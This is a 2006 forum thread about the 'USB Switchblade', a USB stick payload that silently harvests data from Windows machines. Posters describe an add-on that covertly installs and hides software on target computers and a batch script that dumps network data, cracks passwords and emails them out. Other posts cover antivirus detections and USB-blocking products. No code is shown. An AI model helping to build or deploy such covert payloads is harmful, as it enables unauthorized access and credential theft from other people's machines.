Jump to content

USB Switchblade Development

Darren Kitchen

By Darren Kitchen
in USB Hacks

 Share

Recommended Posts

  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

keia71 Newbie

keia71

Posted
Posted

Im still trying to run this on my win 2000 box at work with no luck. I just noticed it detects a virus. How are you suppose to get around that...

Is the u3 version better this? I have a u3 version but if I replace the partion with the new payload can I get my original setup back

Link to comment
Share on other sites
b0xybr0wn Newbie

b0xybr0wn

Posted
Posted

I have created a quick add on for the USB switchblade, that install fold@home on the target computer, then installs it like the hacksaw, which has it run at startup and hides in a folder depending on the privileges. The download link is http://d.turboupload.com/d/1069130/USB-fh.zip.html , I'm sure there is problems somewhere in there, or better ways to do it. Just let me know and I'll fix it.

b0xybr0wn

Link to comment
Share on other sites
keia71 Newbie

keia71

Posted
Posted

I have been playing with these various versions of the payloads and have a question. I was running Cain and Able and was trying to retrieve the LSA secrets and now I get the LSASS.exe error where it automatically reboots my pc in 60 seconds. Did I somehow infect my PC with something in testing these payloads....

Any info will be greatly appreciated

Link to comment
Share on other sites
deathwarder Newbie

deathwarder

Posted
Posted

sorry for the double post, but this is the last time for a while that Ill be able to work on it(1-2days). Ive made it so that it dumps the network info as previously described, and the batch to start auto-cracking and emailing is almost ready. It just bugs out at the last second. If anyone can tell me where to upload it tommorow that would b3e great. I based it off of the dssl payload.

Link to comment
Share on other sites
keia71 Newbie

keia71

Posted
Posted

I have been playing with these various versions of the payloads and have a question. I was running Cain and Able and was trying to retrieve the LSA secrets and now I get the LSASS.exe error where it automatically reboots my pc in 60 seconds. Did I somehow infect my PC with something in testing these payloads....

Any info will be greatly appreciated

Link to comment
Share on other sites
a5an0 Newbie

a5an0

Posted
Posted

/me wories that this thread will suffer the same fate as Pandora......

<flame>

To all of you fsckers who are complaining about your shit not working:

RTMF. If that does not work, stop, think about it, then try again. Use your brain!

</flame>

thank you.

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
/me wories that this thread will suffer the same fate as Pandora......

And thats why usb hacks has its own board now. it's too big for just a thread. i forsee eventually a how-to thread for noobs being stickied. not that noobs need this kind of tool in their arsenal, but hey.

Link to comment
Share on other sites
rastetter Newbie

rastetter

Posted
Posted

The reason people ask for help is because people will usually help them

cant complain that people want help with this. everyone is a noob at one point, and this is fairly new, so you can expect people unable to figure it out, and other miscellaneous problems.

Yes many of the questions are stupid, and the people should be able to figure it out themselves, but sometimes thats not the case

If you have a problem with people asking questions, why dont you just ignore the questions, its not that hard

Link to comment
Share on other sites
renegadecanuck Newbie

renegadecanuck

Posted
Posted

Ras, the problem is that in order to update the U3 partition, you need a program to do so. Currently, I only know of one for Sandisk drives (hence why everyone is recommending buying the Cruzers). If you would have carefully read the main post (or even skimmed over it), you would have seen that. That is why a5an0 is getting upset. He assumed that people would buy supported hardware for this. Until someone can find a way to reverse engineer the Kingston drives (which is possibly illegal) or Kingston releases a tool to update the U3 partition, Kingston users are kinda screwed.

The only other option is hope that someone will write a U3 Launcher compatible loader (I'm trying to, but my coding skills suck, and I'm having a few problems with VBStudio) and install it onto your U3 loader, but then, that removes the possibility of discreetness.

P.S. If people were to search Google for every question, there would be no use for message boards. These exist for communicating (that includes asking question)

Link to comment
Share on other sites
arkon Newbie

arkon

Posted
Posted
@Ouroboros

DeviceLock does most of this. It does not whitelist apps, but drive serials.

Sygate was working on a program that you could "map" applications to whitelist. However, Symantec aquired them and Im not sure what became of it.

May want to check out DeviceWall (http://www.devicewall.com), it has whitelisting, it also has connection and file audits and built in USB encryption as well as measures to prevent tampering. You can block all U3 drives for example, only allow a certain group read access to iPods etc

Link to comment
Share on other sites
keia71 Newbie

keia71

Posted
Posted

I have been playing with these different payloads and also with rainbow crack. This morning I had a message from norton that it found a virus. Is this from one of the payloads.

Scan type: Realtime Protection Scan

Event: Virus Found!

Virus name: Hacktool

File: C:System Volume Information_restore{D1C2C251-F788-4617-A3F2-1132F2ED59F6}RP264A0026729.exe

Location: Quarantine

Computer: BILL

User: SYSTEM

Action taken: Clean failed : Quarantine succeeded : Access denied

Date found: Thu Oct 12 07:08:49 2006

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...